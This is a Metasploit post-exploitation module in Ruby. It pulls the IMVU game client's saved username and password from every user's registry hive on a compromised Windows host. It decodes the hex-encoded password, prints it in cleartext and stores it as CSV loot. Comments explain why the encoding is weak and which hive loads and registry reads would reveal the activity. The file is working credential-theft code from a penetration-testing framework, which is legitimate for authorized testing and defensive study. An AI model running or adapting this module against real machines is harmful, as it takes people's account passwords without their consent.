GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/imvu.rb
# -*- coding: binary -*-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
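# Post module that reads the IMVU client's saved account name and password
# from each user's registry hive and records them as loot.
#
# What the code below shows about the stored secret: the password value is
# recovered with nothing more than character stripping and a hex-to-bytes
# pack. No key or user secret takes part in the decoding, so the registry
# value is an encoding of the password rather than an encrypted form of it.
#
# Review/detection note: the observable side of this routine is (a) user
# hives being loaded and unloaded by the session's process (via
# load_missing_hives / unload_our_hives) and (b) reads of
# <hive>\Software\IMVU\username and <hive>\Software\IMVU\password by a process
# that is not the IMVU client.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   the values below through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Credentials IMVU Game Client',
        'Description' => %q{
          This module extracts account username & password from the IMVU game client
          and stores it as loot.
        },
        'Author' => [
          'Shubham Dawra <shubham2dawra[at]gmail.com>' # www.SecurityXploded.com
        ],
        'License' => MSF_LICENSE,
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ]
      )
    )
  end

  # Walks every user hive, collects any stored IMVU credentials into a table,
  # prints them, and stores the table as a CSV loot file when at least one
  # credential was found.
  #
  # The loot file and the console output both contain the password in
  # cleartext.
  #
  # @return [void]
  def run
    creds = Rex::Text::Table.new(
      'Header' => 'IMVU Credentials',
      'Indent' => 1,
      'Columns' => [
        'User',
        'Password'
      ]
    )

    credcount = 0
    userhives = load_missing_hives

    begin
      userhives.each do |hive|
        next if hive['HKU'].nil?

        vprint_status("Looking at Key #{hive['HKU']}")
        subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\IMVU\\")
        if subkeys.nil? || subkeys.empty?
          print_status('IMVU not installed for this user.')
          next
        end

        user = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\username\\", '')
        hpass = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\password\\", '')

        # The client can be installed without a saved password; the registry
        # read may then come back nil (or empty). Calling String methods on
        # that value used to raise and abort the whole run before the hives
        # were unloaded.
        stored = hpass.to_s
        if stored.empty?
          vprint_status('No stored IMVU password for this user.')
          next
        end

        decpass = decode_password(stored)
        print_good("User=#{user}, Password=#{decpass}")
        creds << [user, decpass]
        credcount += 1
      end
    ensure
      # clean up after ourselves, even if a registry call above raised, so no
      # user hive stays mounted on the host
      unload_our_hives(userhives)
    end

    print_status("#{credcount} Credentials were found.")

    return unless credcount > 0

    print_status('Storing data...')
    path = store_loot(
      'imvu.user.creds',
      'text/csv',
      session,
      creds.to_csv,
      'imvu_user_creds.csv',
      'IMVU User Credentials'
    )
    print_good("IMVU user credentials saved in: #{path}")
  end

  private

  # Turns the stored registry string into the password bytes.
  #
  # The value is lowercased, single quotes are dropped, each "x" or "\x"
  # prefix in front of a two-digit hex pair is removed, and the remaining hex
  # digits are packed into bytes.
  #
  # @param stored [String] raw data of the password registry value
  # @return [String] decoded password bytes
  def decode_password(stored)
    hex = stored.downcase.delete("'").gsub(/\\?x([a-f0-9][a-f0-9])/, '\1')
    [hex].pack('H*')
  end
end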